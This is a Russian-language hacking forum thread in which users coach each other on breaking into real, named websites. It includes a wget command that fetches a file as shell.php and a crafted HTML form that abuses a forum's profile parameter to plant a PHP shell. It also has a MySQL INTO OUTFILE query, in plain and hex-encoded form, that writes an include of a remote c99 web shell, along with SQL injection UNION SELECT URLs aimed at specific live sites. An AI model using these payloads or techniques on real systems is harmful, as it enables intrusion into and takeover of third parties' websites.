Ваши вопросы по уязвимостям.

я пробовал c madnet.name, freehostia, и со своих шеллов, не хочет что то

 

Ну для начала можно научится юзать wget:
wget http://site.ru/1.txt -O shell.php - это сохранит скаченный файл с указанным именем
а не:
wget http://site.ru/1.txt -o shell.php - это поместит лог работы в указанный файл

Только если хост тормознутый, то это не лучший способ - загрузи аватарку с шеллом, а потом просто поменяй расширение на пхп.

 

в данном случае нельзя грузить аватары, chmod на аватарки и images, cache, и все другое, доступны для записи только папки в корне сайта, но при
wget http://site.ru/1.txt -O shell.php , просто создается пустой файл нечего не качается....

 

HAXTA4OK, а толку? если у него хост не конектиться к другим серверам, что при wget'e что при copy результат будет один и тот же

 

А форму для загрузки не судьба использовать?

Локально такуйю форму:

Code:

<form action=http://site.com/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/var/www/images/tyrytrytr.php
 method=post enctype=multipart/form-data>
<input type=file name=file><br> 
<input type=submit value=Загрузить><br>
</form>

только предварительно сидеть у себя в браузере зарегенным на форуме в едит профайле и открывать эту форму в том же браузере, ибо куки. С сразу грузить с компа нормальный шелл

 

как можно использовать то, что при подстановке кавычки появляется следующее:

Server Error in '/inclub' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.


Stack Trace:

[FormatException: Input string was not in a correct format.]
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +0
InClub.Allegati.Page_Load(Object sender, EventArgs e) +95
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750

или это:

Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:

Line 35: private void PopulateDetails()
Line 36: {
Line 37: int intCompanyID = int.Parse(Request.QueryString["CompanyID"]);
Line 38: //int intCompanyID = 20;
Line 39: CompanyHandler objHandler = new CompanyHandler();


Source File: c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsReadOnlyView.ascx.cs Line: 37

Stack Trace:

[FormatException: Input string was not in a correct format.]
System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7471335
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119
System.Int32.Parse(String s) +23
CMSWebParts_Viewers_CompanyDetailsReadOnlyView.PopulateDetails() in c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsReadOnlyView.ascx.cs:37
CMSWebParts_Viewers_CompanyDetailsReadOnlyView.Page_Load(Object sender, EventArgs e) in c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsReadOnlyView.ascx.cs:25
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
CMS.PortalControls.CMSAbstractWebPart.OnLoad(EventArgs e) +212
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627

 

Input string was not in a correct format.
строка не в том формате,там нет скули.
>>как можно использовать то?
увидешь пару строчек кода:

Code:

Line 35: private void PopulateDetails()
Line 36: {
Line 37: int intCompanyID = int.Parse(Request.QueryString["CompanyID"]);
Line 38: //int intCompanyID = 20;
Line 39: CompanyHandler objHandler = new 

и директорию:

Code:

c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsR eadOnlyView.ascx.cs Line: 37

 

я чего то не понимаю наверное

правлю сурс страницы, выбираю, гружу, шелла нет

 

))) какой сурс еще?)) То, что я назвал форма, создай на рабочем столе, обзови 123.html и запусти в том же браузере, где ты УЖЕ сидишь зарегенный на форуме

ЗЫЖ Скопируй код в блокнот, сохрани как 123.txt и переименуй в 123.html, щелкни два раза по файлу мышкой и загружай шелл. Форм экшион сама перенаправит тебя туда, куда нужно

Ах да, вместо site.com вставь реальное название)

 

я только что сейчас так сделал)) не получилось))

 

Тогда по обстоятельствам. Всякое бывает. Надо смотреть

ЗЫЖ В личку ничего не слать

А у тебя хоть phpinfo(); хотя бы выводит?

 

да, выводит)
там еще phpmyadmin, но при

PHP:

select '<? @include("http://madnet.name/files/download/9_c99madshell.php"); ?>' into outfile '/var/www/images/323232323232.php';

он мне

Code:

SQL query:     SELECT '<? @include("http://madnet.name/files/download/9_c99madshell.php"); ?>'  INTO OUTFILE '/var/www/images/323232323232.php'
#1064 - You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

так же все, ковычки

 

еще раз прошу помощи, а именно в поиске названий таблиц и столбцов в 4-ой версии mysql, вот линк _http://www.deyla.com/p_daelenco.php?id_sito=-1+union+select+1, ???? ,3,4,5,6,7,8,9,10,11+from+ ??? --

 

select 0x3c3f2040696e636c7564652822687474703a2f2f6d61646e65742e6e616d652f66696c65732f646f776e6c6f61642f395f6339396d61647368656c6c2e70687022293b203f3e into outfile '/var/www/images/323232323232.php';

 

брут, например c помощью SIPT4

 

нет

 

Народ. Помогите раскрутить скулю.

HTML:

http://www.berline.kiev.ua/?id=5

делаю запрос +union+select+1 - выводит ошибку бла-бла-бла different number of columns.
Прочитал про нее в большом FAQе jokester'a, но всеравно как-то "широко глаза" на этот трабл не открыло.
зы Если не трудно, то можно показать по подробнее на данном примере как добиться вывода запроса.

 

http://www.berline.kiev.ua/?id=-1+union+select+version()--+

там 1 колонка, вывод в тайтле, смотри внимательней...